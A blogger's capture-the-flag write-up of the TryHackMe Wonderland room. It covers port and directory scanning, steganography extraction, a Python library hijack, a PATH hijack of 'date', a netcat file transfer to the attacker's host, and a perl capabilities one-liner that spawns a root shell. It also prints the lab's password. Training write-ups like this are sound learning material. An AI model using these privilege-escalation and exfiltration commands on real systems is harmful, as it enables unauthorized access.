Wonderland — TryHackMe — WriteUP

TonyRahmos
7 min readOct 29, 2020

--

Hello. I’m Rahmos. Here is my Wonderland — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -v <ip>

nmap

As port 80 (HTTP) is opened, let’s access the website.

website

When I click Ctrl + U to view source, there’s nothing much. So let’s now find hidden dirs using dirbuster.

dirbuster

As you can see, there are lots of hidden dirs here. Let’s follow it and we’ll have our final destination to Wonderland at /r/a/b/b/i/t

Door to Wonderland

Crtl + U to view page source and you will see your key to open the door!

Page Source

It looks like the credential for SSH! But just leave it out there first. Let’s access /img and download the .jpg photos and discover them.

/img

As it’s a .jpg photo, we can use steghide to extract hidden data.

steghide extract -sf file-name.jpg

steghide

As you can see, up to now we can only extract hidden data in white_rabbit_1.jpg to hint.txt. Read this file.

hint.txt

There is only that line. The “r a b b i t “ is the hidden sub folders (which we’ve known above by dirbuster). So what’s up now? Let’s login to SSH!

ssh alice@<ip>

ssh

Success! Now get our 1st flag.

ls -l

Well, there is no user.txt inside alice home folder, but there is root.txt 😣 And of course, we cannot read it right now.

Let’s sudo -l to see if Alice can run sudo:

sudo -l

Well that’s it! We can run the python file in our home folder as rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

So basically the script will print out 10 random lines of the poem.

But what suspicious is that, it imports the random library. When we execute the script, it fetches the library needed. These libraries have been stored in predefined locations(directories). And you can use the command below to know those directories.

python3 -c ‘import sys; print(sys.path)’

As you can see, the ‘ ‘ is where the python script will start. It’s our current directory (/home/alice). It will then go through the folders listed above to find “random.py” and use it. Now let’s see where is the random.py.

locate random.py

locate random.py

Now we know that the random.py stays in /usr/lib/python3.6, which is AFTER alice home folder. Which means that if we create a random.py file in alice home folder, the python program will use that random.py, not the real random.py in /usr/lib/python3.6.

Let’s create random.py but inside, we will spawn a shell!

Now save this random.py, chmod +x to make it executable and then, run the walrus_and_the_carpenter.py as rabbit.

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

And now I’m rabbit!

NOTE:

I will explain again what we’ve just done above to get rabbit shell. If you’ve understand already, you can skip this part.

Explaination:

When we execute the python script as rabbit, because it imports the random library, it will go through all the folders listed above to look for “random.py”.
However, we’ve tricked it by creating a random.py in alice home folder, and because alice home folder is the first folder it will go through, the python program will use the random.py we’ve just created and ignore the “real” random.py. Inside this “fake” random.py is 2 lines of code which will spawn a shell. That’s why, we have shell as rabbit!

Ok so let’s get back to Wonderland.

cd to rabbit home folder to see what’s inside.

rabbit home folder

There is an executable file called teaParty. Let’s try execute it.

./teaParty

It gives us the string: Segmentation fault (core dumped). I don’t understand what it does. So let’s get this shell to our machine and decompile it. I will use nc to transfer this file.

On your machine, start a listener:

nc -lvnp 4444

On ssh machine, run:

nc <your-host-ip> 4444 < teaParty

Wait a while and press Ctrl + C. You will have the teaParty on your machine. I will use ghidra to decompile it.

ghidra

After decompiling, I can conclude that the program does nothing special but print out those lines. But what we need to focus on here is, there is a “system” line. And it calls “date” binary. When the script execute, it will get result from “date” + 1 hour and print out.

As I can execute date from command line, it will be stored in /bin/date. And again, what if we create a “date” program and puts it in the folder BEFORE /bin? The program will execute this malicious “date” instead of the real “date”!

So what will we do now? We will create a script called “date”, inside it we will spawn a shell in /tmp folder (as we have all permissions on this folder), export it to PATH before /bin.

create “date”

Then chmod +x date to make it executable.

Now run this cmd to add tmp to PATH env (in order to execute program in command line, this script’s folder, which is /tmp, needed to be in PATH env):

export PATH =/tmp:$PATH

As you can see, /tmp has been added to PATH env.

Now run the teaParty again.

Now I’m hatter! See what’s inside hatter folder

It’s a password: WhyIsARavenLikeAWritingDesk? .I’ve tried to su to tryhackme with that password but it didn’t work. So that’s password for hatter only.

Now let’s see if we can run sudo by hatter

sudo -l

sudo -l

Uh-oh! We cannot run sudo as hatter. So we will find another way. Let’s get the linpeas.sh. You can either download it or transfer it from your machine. In case you choose to transfer, here is the cmd:

scp linpeas.sh hatter@<ip>:/home/hatter

scp

Now get back to the ssh machine. Execute this shell.

./linpeas.sh > result.txt

Scroll down and I see a line “Capabilities

capabilities

It’s perl command. Look at https://gtfobins.github.io/gtfobins/perl/#capabilities

We will get root using perl.

$(which perl) -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’

perl to privesc

Finally I’m root! Let’s get all of our flags.

The end.

HAPPY HACKING

--

--